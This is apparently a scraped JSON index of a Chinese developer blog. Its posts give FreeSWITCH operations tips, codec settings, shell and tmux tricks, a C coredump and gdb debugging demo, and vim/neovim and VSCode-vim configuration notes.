\u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启\n呼叫相关指令 # 显示当前呼叫 show calls # 显示呼叫数量 show calls count # 挂断某个呼叫 uuid_kill 58579bd2-db78-4c7e-a666-0f16e19be643 # 挂断所有呼叫 hupall # sip抓包 sofia profile internal siptrace on sofia profile external siptrace on # 拨打某个用户并启用echo回音 originate user/1000 \u0026amp;echo 正则测试 在fs_cli里面可以用regex快速测试正则是否符合预期结果\nregex 123123 | \\d regex 123123 | ^\\d* 变量求值 eval $${mod_dir} eval $${recording_dir} 修改UA信息 sofia_external.conf.xml sofia_internal.conf.xml \u0026lt;param name=\u0026#34;user-agent-string\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;username\u0026#34; value=\u0026#34;wdd\u0026#34;/\u0026gt; 修改之后需要rescan profile.\nmod_distributor的两个常用指令 # reload distributor_ctl reload # 求值 eval ${distributor(distributor_list)} 自动接听回音测试 \u0026lt;extension name=\u0026#34;wdd_echo\u0026#34;\u0026gt; \u0026lt;condition field=\u0026#34;destination_number\u0026#34; expression=\u0026#34;^8002\u0026#34;\u0026gt; \u0026lt;action application=\u0026#34;info\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;answer\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;action application=\u0026#34;echo\u0026#34; data=\u0026#34;\u0026#34;\u0026gt;\u0026lt;/action\u0026gt; \u0026lt;/condition\u0026gt; \u0026lt;/extension\u0026gt; odbc-dsn配置错误,fs进入假死状态 最近遇到一个奇怪的问题,相同的fs镜像,在一个环境正常运行,但是再进入另一个环境的时候,fs进程运行起来了,但是所有的功能都异常,仿佛进入了假死状态。并且控制台的日志输出也没有什么有用的信息。\n后来,我想起来以前曾经遇到过这个问题。\n这个fs的镜像中没有编译odbc相关的依赖,但是看sofia_external.conf.xml和sofia_internal.conf.xml, 却有odbc相关的配置。\n\u0026lt;param name=\u0026#34;odbc-dsn\u0026#34; value=\u0026#34;....\u0026#34;\u0026gt; 所以只要把这个odbc-dsn的配置注释掉,fs就正常运行了。\n取消session-timer 某些情况下fs会对呼入的电话,在通过时长达到1分钟的时候,向对端发送一个re-invite, 实际上这还是一个invite请求,只是to字段有了tag参数。这个机制叫做session-timer, 具体定义在RFC4028中。\n但是某些SIP终端可能不支持re-invite, 然后不对这个re-invite做回应,或者回应了一个错误的状态码,都会导致这通呼叫异常挂断。\n在internal.xml中修改如下行:\n\u0026lt;param name=\u0026#34;enable-timer\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; RTP失活超时检测 某个时刻开始,客户端无法再向FS发送流媒体了。例如客户端Web页面关闭,或者浏览器关闭。\n但是在这种场景下,FS还是会向客户端发送一段时间的媒体流,然后再发送BYE消息。那么,我们如何控制这个RTP失活的检测时间呢?\n在internal.xml或者external.xml中,有以下参数,可以控制检测RTP超时时间。\nrtp-timeout-sec rtp超时秒数 rtp-hold-timeout-sec rtphold超时秒数 \u0026lt;param name=\u0026#34;rtp-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; \u0026lt;param name=\u0026#34;rtp-hold-timeout-sec\u0026#34; value=\u0026#34;10\u0026#34;/\u0026gt; sofia profile internal restart\nfs 配置多租户分机 分机的相关配置都是位于conf/directory目录中, 我的directory目录中只有一个default.xml文件\n\u0026lt;include\u0026gt; \u0026lt;domain name=\u0026#34;123.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;domain name=\u0026#34;abc.cc\u0026#34;\u0026gt; \u0026lt;user id=\u0026#34;1000\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;user id=\u0026#34;1001\u0026#34;\u0026gt; \u0026lt;params\u0026gt; \u0026lt;param name=\u0026#34;password\u0026#34; value=\u0026#34;1234\u0026#34;/\u0026gt; \u0026lt;/params\u0026gt; \u0026lt;/user\u0026gt; \u0026lt;/domain\u0026gt; \u0026lt;/include\u0026gt; fs状态转移图 ","permalink":"https://wdd.js.org/freeswitch/tips/","summary":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [register | unregister] [\u0026lt;gateway name\u0026gt; | all] killgw \u0026lt;gateway name\u0026gt; [stun-auto-disable | stun-enabled] [true | false]] siptrace \u0026lt;on|off\u0026gt; capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia \u0026lt;status|xmlstatus\u0026gt; profile \u0026lt;name\u0026gt; [reg [\u0026lt;contact str\u0026gt;]] | [pres \u0026lt;pres str\u0026gt;] | [user \u0026lt;user@domain\u0026gt;] sofia \u0026lt;status|xmlstatus\u0026gt; gateway \u0026lt;name\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9] sofia tracelevel \u0026lt;console|alert|crit|err|warning|notice|info|debug\u0026gt; sofia help -------------------------------------------------------------------------------- 开启消息头压缩 \u0026lt;param name=\u0026#34;enable-compact-headers\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt; fs需要重启","title":"FS常用运维手册"},{"content":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; sofia profile internal restart \u0026gt; sofia profile external restart ","permalink":"https://wdd.js.org/freeswitch/media-settings/","summary":"查看FS支持的编码 show codec 编码设置 vars.xml\nglobal_codec_prefs=G722,PCMU,PCMA,GSM outbound_codec_prefs=PCMU,PCMA,GSM 查看FS使用的编码 \u0026gt; sofia status profile internal CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM \u0026gt; sofia status profile external CODECS IN ILBC,PCMU,PCMA,GSM CODECS OUT ILBC,PCMU,PCMA,GSM 使修改后的profile生效 \u0026gt; sofia profile internal rescan \u0026gt; sofia profile external rescan 重启profile \u0026gt; sofia profile internal restart \u0026gt; sofia profile external restart ","title":"FreeSWITCH 媒体相关操作"},{"content":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来考本文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","permalink":"https://wdd.js.org/posts/2022/05/shell-101/","summary":"复制文本到剪贴板 sudo apt install xclip vim ~/.zshrc\nalias copy=\u0026#39;xclip -selection clipboard\u0026#39; 这样我们就可以用copy命令来考本文件内容到系统剪贴板了。\ncopy aaa.txt 判断工作区是否clean if [ -z \u0026#34;$(git status --porcelain)\u0026#34; ]; then # Working directory clean else # Uncommitted changes fi ","title":"Shell 教程技巧"},{"content":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later \u0026lt;http://gnu.org/licenses/gpl.html\u0026gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \u0026#34;show copying\u0026#34; and \u0026#34;show warranty\u0026#34; for details. This GDB was configured as \u0026#34;arm-linux-gnueabihf\u0026#34;. Type \u0026#34;show configuration\u0026#34; for configuration details. For bug reporting instructions, please see: \u0026lt;http://www.gnu.org/software/gdb/bugs/\u0026gt;. Find the GDB manual and other documentation resources online at: \u0026lt;http://www.gnu.org/software/gdb/documentation/\u0026gt;. For help, type \u0026#34;help\u0026#34;. Type \u0026#34;apropos word\u0026#34; to search for commands related to \u0026#34;word\u0026#34;... Reading symbols from ./hello...done. [New LWP 25571] Core was generated by `./hello\u0026#39;. Program terminated with signal SIGSEGV, Segmentation fault. #0 0x0001045c in crash () at hello.c:6 6 *p = 0; (gdb) bt full #0 0x0001045c in crash () at hello.c:6 p = 0x0 #1 0x00010490 in main () at hello.c:13 phone = {66328, 0, 0, 0} ","permalink":"https://wdd.js.org/posts/2022/05/c-and-gdb/","summary":"开启coredump #如果该命令的返回值是0,则表示不开启coredump ulimit -c # 开启coredump ulimit -c unlimited 准备c文件 #include\u0026lt;stdio.h\u0026gt; void crash() { char * p = NULL; *p = 0; } int main(){ printf(\u0026#34;hello world 1\u0026#34;); int phone [4]; phone[232] = 12; crash(); return 0; } 编译执行 gcc -g hello.c -o hello ./hello 之后程序崩溃,产生core文件。\ngdb分析 gdb 启动的二进制文件 core文件\ngdb ./hello ./core 之后输入: bt full 可以查看到更详细的信息\n➜ c-sandbox gdb ./hello ./core GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git Copyright (C) 2016 Free Software Foundation, Inc.","title":"C和gdb调试"},{"content":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","permalink":"https://wdd.js.org/posts/2022/05/tmux-faq/","summary":"oh my tmux 关闭第二键ctrl-a ctrl-a可以用来移动光标到行首的,不要作为tmux的第二键\nset -gu prefix2 unbind C-a Tmux reload config :source-file ~/.tmux.conf tmux 显示时间 ctrl b + t tmux从当前目录打开新的窗口 bind \u0026#39;\u0026#34;\u0026#39; split-window -c \u0026#34;#{pane_current_path}\u0026#34; bind % split-window -h -c \u0026#34;#{pane_current_path}\u0026#34; bind c new-window -c \u0026#34;#{pane_current_path}\u0026#34; ","title":"Tmux 常见问题以及解决方案"},{"content":"修改coc-vim的错误提示 coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的掩饰搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","permalink":"https://wdd.js.org/vim/vim-faq/","summary":"修改coc-vim的错误提示 coc-vim的错误提示窗口背景色是粉红,前景色是深红。这样的掩饰搭配,很难看到具体的文字颜色。\n所以我们需要把前景色改成白色。\n:highlight CocErrorFloat ctermfg=White 参考 https://stackoverflow.com/questions/64180454/how-to-change-coc-nvim-floating-window-colors\nvim go一直卡在初始化 有可能没有安装二进制工具\n:GoInstallBinaries neovim 光标变成细线解决方案 :set guicursor= ","title":"Vim 常见问题以及解决方案"},{"content":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能comand+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, leader快捷键 在插入模式安jj会跳出插入模式 ,a: 跳到行尾部,并进入插入模式 ,c: 关闭当前标签页 ,C: 关闭其他标签页 ,j: 跳转到左边标签页 ,k: 跳转到右边标签页 ,w: 保存文件 ,t: 给出提示框 ,b: 显示或者隐藏文件树窗口 完整的配置 \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, \u0026#34;vim.insertModeKeyBindings\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;j\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;\u0026lt;Esc\u0026gt;\u0026#34; ] } ], \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeActiveEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;C\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.closeOtherEditors\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.previousEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;k\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.nextEditor\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;w\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.files.save\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;t\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;editor.action.showHover\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;b\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.action.toggleSidebarVisibility\u0026#34; ] }, ] ","permalink":"https://wdd.js.org/vim/vscode-vim/","summary":"我承认,vscode很香,但是vim的开发方式也让我无法割舍。\nvscode中有个vim插件,基本上可以满足大部分vim的功能。\n这里我定义了我在vim常用的leader快捷键。\n设置,为默认的leader \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, 在Normal模式能comand+c复制 \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, leader快捷键 在插入模式安jj会跳出插入模式 ,a: 跳到行尾部,并进入插入模式 ,c: 关闭当前标签页 ,C: 关闭其他标签页 ,j: 跳转到左边标签页 ,k: 跳转到右边标签页 ,w: 保存文件 ,t: 给出提示框 ,b: 显示或者隐藏文件树窗口 完整的配置 \u0026#34;vim.leader\u0026#34;: \u0026#34;,\u0026#34;, \u0026#34;vim.insertModeKeyBindings\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;j\u0026#34;, \u0026#34;j\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;\u0026lt;Esc\u0026gt;\u0026#34; ] } ], \u0026#34;vim.handleKeys\u0026#34;: { \u0026#34;\u0026lt;C-c\u0026gt;\u0026#34;: false, \u0026#34;\u0026lt;C-v\u0026gt;\u0026#34;: false }, \u0026#34;vim.normalModeKeyBindingsNonRecursive\u0026#34;: [ { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;a\u0026#34; ], \u0026#34;after\u0026#34;: [ \u0026#34;A\u0026#34; ] }, { \u0026#34;before\u0026#34;: [ \u0026#34;\u0026lt;leader\u0026gt;\u0026#34;, \u0026#34;c\u0026#34; ], \u0026#34;commands\u0026#34;: [ \u0026#34;workbench.","title":"vscode vim插件自定义快捷键"},{"content":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-set) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 对于windows和mac来说,只有有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器\n\u0026#34;* 12345 如果按了ctrl + c\n\u0026#34;* 12345 \u0026#34;+ 12345 所以,在vim中如果想粘贴系统剪贴板中的内容,可以是用 C-R * 或者 C-R +\n如何把vim buffer中的全部内容复制到系统剪贴板? :%y+ ","permalink":"https://wdd.js.org/vim/clipboard/","summary":"neovim如何与系统剪贴板交互? neovim和系统剪贴板的交互方式和vim的机制是不同的,所以不要先入为主的用vim的方式使用neovim。\nneovim需要外部的程序与系统剪贴板进行交互,参考:help clipboard\nneovim按照如下的优先级级方式选择交互程序:\n- |g:clipboard| - pbcopy, pbpaste (macOS) - wl-copy, wl-paste (if $WAYLAND_DISPLAY is set) - xclip (if $DISPLAY is set) - xsel (if $DISPLAY is set) - lemonade (for SSH) https://github.com/pocke/lemonade - doitclient (for SSH) http://www.chiark.greenend.org.uk/~sgtatham/doit/ - win32yank (Windows) - termux (via termux-clipboard-set, termux-clipboard-set) - tmux (if $TMUX is set) 因为我的操作系统是linux, 所以方便的方式是直接安装xclip。\nsudo pacman -Syu xclip 两个系统剪贴板有何不同? 对于windows和mac来说,只有有一个系统剪贴板,对于linux有两个。\n剪贴板,鼠标选择剪贴板 剪贴板,选择之后复制剪贴板 如下图,我用鼠标选择了12345, 但是没有按ctrl + c, 这时候你打开nvim, 执行:reg, 可以看到注册器","title":"和系统剪贴板进行交互"},{"content":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","permalink":"https://wdd.js.org/vim/search-dir-replace/","summary":"在vscode中,可以选中一个目录,然后在目录中搜索对应的关键词,再查找到对应文件中,然后做替换。\n在vim也可以这样做。\n但是这件事要分成两步。\n根据关键词,查找文件 对多个文件进行替换 搜索关键词 搜索关键词可以用grep, 或者vim自带的vimgrep。\n但是我更喜欢用ripgrep,因为速度很快。\nripgrep也有对应的vim插件 https://github.com/jremmen/vim-ripgrep\n例如要搜索关键词 key1, 那么符合关键词的文件将会被放到quickfix列表中。\n:Rg key1 可以用 :copen 来打开quickfix列表。\n替换 cdo :cdo %s/key1/key2/gc c表示在替换的时候,需要手工确认每一项。\n在替换的时候,可以输入\ny (yes)执行替换 n (no)忽略此处替换 a (all)替换此处和之后的所有项目 q (quit) 退出替换过程 l (last) 替换此处后退出 ^E 向上滚动屏幕 ^Y 向下滚动屏幕 ","title":"搜索工作目录下的文件并替换"},{"content":" Info C表示按住Ctrl, C-o表示同时按住Ctrl和o 1. 在tmux中 vim-airline插件颜色显示不正常 解决方案:\nexport TERM=screen-256color 2. buffer相关操作 :ls # 显示所有打开的buffer :b {bufferName} #支持tab键自动补全 :bd # 关闭当前buffer :bn # 切换到下一个buffer :bp # 切换到上一个buffer :b# # 切换到上一个访问过的buffer :b1 # 切换到buffer1 :bm # 切换到最近修改过的buffer :sb {bufferName} # 上下分屏 :vert sb {bufferName} # 左右分屏 3. 跳转到对应的符号上 下面这种符号,一般都是成双成对的,只要在其中一个上按%, 就会自动跳转到对应的符号\n() [] {} 4. 关闭netrw的banner 如果熟练的是用了netrw,就可以把默认开启的banner给关闭掉。\nlet g:netrw_banner = 0 let g:netrw_liststyle = 3 let g:netrw_winsize = 25 5. 如何同时保存所有发生变化的文件? 把所有发生变化的文件给保存 :wa 把所有发生变化的文件都保存,然后退出vim :xa 退出vim, 所有发生变化的文件都不保存,:qa! 6. 插入当前时间 :r!date 7. 光标下的文件跳转 按gf可以跳转光标下的文件\nimport {say} from \u0026#39;./api\u0026#39; 也有可能跳的不准确,或者找不到,因为vim不知道文件后缀\n:set suffixesadd+=.js 8. 文件对比 如果你安装了vim, vimdiff就会自动携带\nvimdiff a.txt b.txt 9. 在插入模式快速删除 C-h 删除前一个字符 C-w 删除前一个单词 C-u 删除到行首 10. 在多行末尾增加特定的字符 例如下面的命令,可以在多行末尾增加;\n:%s/$/;/ 11. 对撤销进行撤销 u可以用来撤销,C-r可以用来对撤销进行撤销\n12. 重新读取文件 假如你对一个文件进行了一些修改,但是还没有保存,这是你想丢弃这些修改,如果用撤销的话,太麻烦。\n你可以用下面的命令,让vim重新读取磁盘上的文件,覆盖当前buffer中的文件。\n:e! 13. 对当前buffer执行外部命令 例如对go代码进行格式化\n:!go fmt % 也可以是一个json文件,我们可以用行选中之后执行:'\u0026lt;,'\u0026gt;!jq, 如果需要对全文进行json格式化,可以使用:%!jq\n{\u0026#34;name\u0026#34;:\u0026#34;wdd\u0026#34;,\u0026#34;age\u0026#34;:1} { \u0026#34;name\u0026#34;: \u0026#34;wdd\u0026#34;, \u0026#34;age\u0026#34;: 1 } Warning !和命令之间不能有空格 14. 只读模式打开文件 只读模式打开文件: vim -R file 禁止修改打开文件: vim -M file 15. 显示或者隐藏特殊字符 :set list :set nolist 16. 把另一个文件读取到当前buffer里面 b.txt是另一个文件\n# 读取到光标的位置 :read b.txt # 读区到当前buffer的开头 :0read b.txt # 读区到当前buffer的结尾 :$read b.txt 17. 把当前文件的一部分写入到另一个文件中 # 把当前文件写入到c.txt, 如果c.txt存在,则写入失败 :write c.txt # 把当前文件写入到c.txt, 如果c.txt存在,则强制写入 # 注意这里!必须紧跟着write, 并且空格是必须的,否则就是执行外部命令了 :write! c.txt # 把当前文件的当前行到文件末尾写入到c.txt :.$write c.txt # 把当前文件以追加的方式写入到另一个文件中 :write \u0026gt;\u0026gt;c.txt 18. 自带文件浏览器的必背命令 :Sex # 文件浏览器上下分布 :Vex # 文件浏览器左右分布 F1 打开帮助信息 % 创建文件 d 创建目录 D 删除文件或者目录 R 文件重命名 gh 隐藏以.开头的文件 返回上一级 t 用新的标签页面页面打开文件 c 把浏览的目录设置为当前工作的目录 19. 执行命令后,快速进入插入模式 C 从光标处删除到行尾,然后进入插入模式 S 清空当前行的内容,然后进入插入模式 s 删除光标下的字符,然后进入插入模式 O\t在当前行上插入一行,然后进入插入模式 o\t在当前行下插入一行,然后进入插入模式 I\t光标移动当当前行的一个字符前,然后进入插入模式 A\t贯标移动到当前航的最后一个字符后,然后进入插入模式 20. 必会的几个寄存器 有名寄存器 a-z 黑洞寄存器 _ 表达式寄存器 = 当前文件名寄存器 % 上次查找的模式寄存器 / 复制专用寄存器 0 C-r 是用来调用寄存器的。比如说我想粘贴当前文件名,我只需要按C-r %, 就可以自动粘贴到当前的文件中\n21. 基于tag的跳转 C-] 跳到对应tag上 C-o 跳回来 C-t 跳回来 C-w ] 在新的window中打开标签 C-w } 预览 pclose 关闭预览 22. html标签删除 dit 删除标签内部的元素 dat 删除标签 23. 原始格式粘贴 如果粘贴到vim中的文本缩进出现问题,\n:set paste 然后再执行C-v粘贴\n取消粘贴模式用 :set nopaste\n24. 按列删除或者按列保留 # 只保留第二列 :%!awk \u0026#39;{print $2}\u0026#39; # 删除第二列 :%!awk \u0026#39;{$2=\u0026#34;\u0026#34;;print $0}\u0026#39; 25. 查找多个关键词 /key1\\|key2\\|key3 26. 快速将光标所在行移动到屏幕中央 zz 26. 窗口快捷键 工作区切分窗口命令 s 水平切分窗口,新窗口仍然显示当前缓冲区 v 垂直切分窗口,新窗口仍然显示当前缓冲区 sp {file} 水平切分为当前窗口,新窗口中载入file vsp {file} 垂直切分窗口,并在新窗口载入file 窗口之间切换 w 在窗口间循环切换 h 切换到左边窗口 l 切换到右边窗口 j 切换到下边的窗口 k 切换到上边的窗口 窗口关闭 :clo[se] 关闭活动窗口 :on[ly] 关闭其他窗口 窗口改变大小 = 使所有窗口等宽等高 _ 最大化活动窗口的高度 | 最大化活动 27. 9种插入模式 i 进入插入模式,所输入新的内容将会在正常模式所在光标的前面 a 进入插入模式,所输入的新的内容将会在正常模式所在光标的后面 你知道从插入模式退出的时候,光标会向前移动一个字符吗?\n进入插入模式的技巧\ni 在光标前插入 a 在光标后插入 A 在行的末尾进入插入 I (大写的i), 在行的第一个非空白字符前进入插入模式 C 删除光标后的所有字符,然后进入插入模式 s 删除光标后的一个字符,然后进入插入模式 S 清空当前行,然后进入插入模式 o 在当前行的下面一行新建一行,并进入插入模式 O 在当前行的上面一行新建一行,并进入插入模式 28. 算数运算 ctrl a 对数字进行加运算, 如果光标不在数字上,将会自动向后移动道对应的数字上 ctrl x 对数字进行减运算 29. 可视模式快捷键 v 激活面向字符的可视模式 再按一次,可以退出 V 激活面向行的可视模式, 再按一次可以退出 ctrl v 激活面向列的可视模式 gv 重选上次的选区 o 移动选区的端点 30. 把光标所在的单词插入到Ex C-r C-w 31. 全局 文件另存为 :saveas filename 关闭当前窗口 :close 32. 光标移动 移动光标到页面顶部,中部,底部 H,M,L 移动到下个单词开头,结尾 w,e 移动到上个单词开头 b 移动光标 上下左右 k,j,h,l 移动到匹配的括号 % 移动到行首 0 移动到行首非空白字符 ^ 移动到行尾非空白字符 g 移动到行尾 $ 移动到文件第一行 gg 移动到文件最后一行 G 移动到第10行 10G 移动屏幕使光标居中 zz 跳转到上一次的位置 ctrl+o 例如你在159行,然后你按了gg, 光标调到了第一行,然后你按ctrl+o, 光标会回到159行 跳转到下一次的位置 ctrl+i 跳转到下个同样单词的地方 * 跳转到上个同样单词的地方 # 跳到字符a出现的位置 fa, Fa 调到字符a出现的前一个位置 ta, Ta 